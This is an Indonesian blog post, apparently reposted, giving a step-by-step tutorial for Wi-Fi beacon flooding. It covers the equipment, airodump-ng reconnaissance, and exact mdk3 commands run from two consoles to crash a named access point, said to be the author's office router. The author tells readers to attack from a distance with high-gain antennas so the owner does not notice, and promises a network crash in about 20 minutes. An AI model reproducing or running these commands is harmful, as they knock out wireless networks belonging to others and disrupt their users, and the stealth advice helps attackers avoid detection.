"TERIMA KASIH ATAS KUNJUNGAN ANDA DAN SEMOGA ARTIKEL INI BERMANFAAT UNTUK KITA SEMUA "HIDUP BLOGGER" ....... Informasi, artikel dan berita dalam blog ini saya ambil dari berbagai sumber : blogger, wordpress dan website

Beacon Flooding

Beacon Flooding : tindakan penyerangan dengan mengirimkan "Beacon Frames" dengan membuat banyak
Fake AP. Tindakan ini akan mengakibatkan jaringan wireless menjadi "crash" untuk beberapa waktu.

Persiapan :
[0] Wireless USB, saya mempergunakan 3 devices wireless USB yang support dengan packet injection, yaitu :
. Intel Wireless 3945ABG (My internal notebook Wireless).
Wireless devices ini saya gunakan untuk menjalankan Kismet dan Kismet Console.

. AirLive WL-360USB dengan antena Omni AirLive 10 dbi
Wireless devices ini saya gunakan untuk melakukan penyerangan pada Console 1.

. AirLive WL-1600USB dengan antena Omni AirLive 10 dbi
Wireless devices ini saya gunakan untuk melakukan penyerangan pada Console 2.
* Penyerangan dilakukan melalui 2 console agar AP yang menjadi target mendapat serangan yang
benar2 terserang.
* Saya mempergunakan antena omni 10 dbi agar dapat melakukan tindakan penyerangan dari kejauhan...
kalo dari deket nanti ketauan pemilik AP loh... becarefull !!!
[1] Dalam penyerangan ini saya mempergunakan Linux BackTrack 4 R1, saya tidak mempergunakan BackTrack 4 R2 karena saya belum donlod...lol
[2] Tentu ada AP yang menjadi target !!! kali ini yang menjadi target adalah AP milik kantor tempat saya bekerja yaitu : Linksys WRT54GL yang sudah diupgrade firmwarenya meempergunakan DDWRT versi 2.4 SP1.
Bagaimana teknik penyerangan :
+------------------------------------------------------------------------------+
| Memastikan devices wireless yang kita gunakan sudah terpasang :   |
+------------------------------------------------------------------------------+


+------------------------------------------------+
| Memastikan ada AP yang akan diserang : |
+------------------------------------------------+
root@bt:~# airodump-ng wlan1
Perhatikan, yang menjadi target dalam kali ini adalah :
+----------------------------------------------------------------------------------+
| 00:25:9C:C1:30:0E   -37   484   0   0   11   54e.   WPA   TKIP   PSK   Hack_Me   |
+----------------------------------------------------------------------------------+
+--------------------------------------+
| Penyerangan : Beacon Flooding    |
+--------------------------------------+

command : ./mdk3 <wifi_interface> b -n <ssid_target>
. lakukan penyerangan pada 2 console :
console 1 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan1  b  -n  Hack_Me

console 2 :
root@bt:/pentest/wireless/mdk3# ./mdk3 wlan2  b  -n  Hack_Me




Hasil Penyerangan yang dipantau Kismet Console :
* Lakukan teknik penyerangan ini selama kurang lebih (--pake txt susah bikin " + - "nih ) 20 menit saja, saya pastikan setelah 20 menit maka jaringan wireless akan "crash". Now.. say " Bye..bye...AP " lol
Makin lama melakukan penyerangan ini, maka makin banyak Fake AP yang tercipta nah Fake AP inilah yang akan melakukan penyerangan dan menciptakan crash AP yang menjadi target.
Makin banyak Fake AP yang tercipta itu artinya juga makin banyak client yang bingung melakukan koneksi ke AP karena nama SSID yang dimiliki si Fake AP pun sama.

Sumber : lirva32.org